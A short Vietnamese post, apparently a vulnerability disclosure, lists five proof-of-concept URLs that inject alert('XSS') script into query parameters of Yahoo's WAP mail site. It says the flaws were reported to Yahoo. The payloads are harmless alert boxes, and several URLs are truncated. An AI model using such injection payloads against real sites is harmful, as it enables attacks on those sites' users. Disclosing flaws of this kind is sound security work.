Lỗi XSS của Mail Yahoo WAP

ở trang  http://wap.oa.yahoo.com có 1 số lỗi XSS khá nặng :

http://wap.oa.yahoo.com/raw?dp=mail...l&uid=51661alert('XSS')

http://wap.oa.yahoo.com/raw?dp=mail&fdr=Bulk+Mailalert('XSS')&uid=51661

http://wap.oa.yahoo.com/raw?dp=mail...id&fdr=Sentalert('XSS')

http://wap.oa.yahoo.com/raw?dp=mail...d&fdr=Draftalert('XSS')

http://wap.oa.yahoo.com/raw?dp=mail...d&fdr=Trashalert('XSS')

Đã thông báo cho Yahoo !.